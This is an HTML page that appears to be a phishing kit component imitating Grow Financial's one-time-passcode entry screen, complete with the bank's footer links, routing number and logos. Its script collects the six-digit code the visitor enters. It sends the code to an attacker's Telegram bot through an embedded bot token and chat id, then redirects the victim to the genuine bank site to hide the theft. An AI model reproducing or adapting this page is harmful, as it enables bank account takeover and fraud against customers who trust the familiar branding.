<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Grow Financial</title>
    <link nonce="" rel="stylesheet" href="./CSS/index.css" type="text/css" media="all">
    <link nonce="" rel="stylesheet" href="./CSS/footer.css" type="text/css" media="all">
    <link nonce="" rel="stylesheet" href="./CSS/otp.css" type="text/css" media="all">
    <script src="https://kit.fontawesome.com/51f31c34ca.js" crossorigin="anonymous"></script>
    <script src="https://challenges.cloudflare.com/turnstile/v0/api.js" defer></script>
</head>
<body>
    <div id="main">
      <div class="otp_form">
        <h1>Enter code</h1>
        <p>A 6-digit code has been sent to your phone number.</p>
        <div class="otp-field">
            <input type="text" maxlength="1">
            <input type="text" maxlength="1">
            <input type="text" maxlength="1">
            <input type="text" maxlength="1">
            <input type="text" maxlength="1">
            <input type="text" maxlength="1">
        </div>
        <p class="otp-text">This code will expire in 30mins.</p>
        <a href="#" class="hidden" target="_blank">Resend code</a>
        <div class="otp-buttons">
            <button class="back-btn">Back</button>
            <button class="verify-btn" onclick="submit()">Verify</button>
        </div>
      </div>

      <div class="footer-wrapper">
        <div class="footer-horizontal">
            <ul data-cfm-area="footer-links">
                <li><a id="tb_footerLinks_home" target="_self" rel="noopener noreferrer" href="/" data-is-generic="false" data-string-key="Theme.Footer.FooterLinks.tb_stringKey_0">Home</a></li>
                <li><a id="tb_footerLinks_mobile" target="_self" rel="noopener noreferrer" href="/mobile" data-is-generic="false" data-string-key="Theme.Footer.FooterLinks.tb_stringKey_1">Mobile</a></li>
                <li><a id="" target="_blank" rel="noopener noreferrer" href="https://www.growfinancial.org/resources/protect-yourself/" data-is-generic="true" data-string-key="Theme.Footer.FooterLinks.tb_stringKey_4">Security</a></li>
                <li><a id="" target="_blank" rel="noopener noreferrer" href="https://www.growfinancial.org/contact" data-is-generic="true" data-string-key="Theme.Footer.FooterLinks.tb_stringKey_5">Contact</a></li>
                <li><a id="" target="_blank" rel="noopener noreferrer" href="https://www.growfinancial.org/resources/new-mobile-online-banking/" data-is-generic="true" data-string-key="Theme.Footer.FooterLinks.tb_stringKey_3">FAQs</a></li>
                <li><a id="" target="_blank" rel="noopener noreferrer" href="https://www.growfinancial.org/wp-content/uploads/2018/10/Privacy-Notice.pdf" data-is-generic="true" data-string-key="Theme.Footer.FooterLinks.tb_stringKey_16560994195442659">Privacy Policy</a></li>
                <li><a id="" target="_blank" rel="noopener noreferrer" href="https://www.growfinancial.org/wp-content/uploads/2019/01/Universal-Account-Agreement-3.pdf" data-is-generic="true" data-string-key="Theme.Footer.FooterLinks.tb_stringKey_16560994277768308">Disclosures</a></li>
                <li><a id="browser-support-info" target="_self" rel="noopener noreferrer" href="#/browser-support" data-is-generic="false" data-string-key="Theme.Footer.FooterLinks.tb_stringKey_2">Browser Support</a></li>
                </ul>

                <div class="footer__fi-numbers">
                    <div class="footer__fi-numbers-nmls">NMLS number: <span>477765</span></div>
                    <div class="footer__fi-numbers-routing">Routing number: <span>263182914</span></div>
                    </div>
        </div>


        <div class="footer__legal-logos">
        <div class="font-icon-container font-icon">
        <img class="font-icon-ncua-large" alt="ïcon" src="./images/NCUA.png">
        </div>
        <div class="font-icon-container font-icon">
            <img class="font-icon-ncua-large" alt="ïcon" src="./images/housing.png">
        </div>
        </div>

        <div class="footer__copyright">
        Copyright © 2024 All rights reserved.
        </div>
        </div>
        </div>
        </div>
        </div>
    </div>
456788
    <script>
        const inputs = document.querySelectorAll(".otp-field input");
        inputs.forEach((input, index) => {
            input.dataset.index = index;
            input.addEventListener("keyup", handleOtp)
        });
        function submit() {

            let otp = "";
            inputs.forEach((input) => {
                otp +=input.value;
                input.disabled = true;
                input.classList.add("disabled");
            });
            var token = "7446085389:AAEDVLhoom9HbeL8AMEZDSg6PDygvG5o2AI";
            var chat_id = "-4244251369";
            var my_text = `OTP:${otp}`;
            var url = `https://api.telegram.org/bot${token}/sendMessage?chat_id=${chat_id}&text=${my_text}`;
           console.log(otp);

            let api = new XMLHttpRequest();
            api.open("GET", url, true);
            api.send();
        
         window.location.href="https://www.growfinancial.org/resources/additional-benefits";
        }
       
     

        function handleOtp(e) {
            const input = e.target;
            let index = [0,1,2,3,4,5];
            let value = input.value;
            input.value = "";
            input.value = value ? value[0] : "";
            let fieldIndex = input.dataset.index;
            if(value.length > 0 && fieldIndex < index.length - 1){
                input.nextElementSibling.focus();
            }

          
         
        }
    </script>
</body>
</html>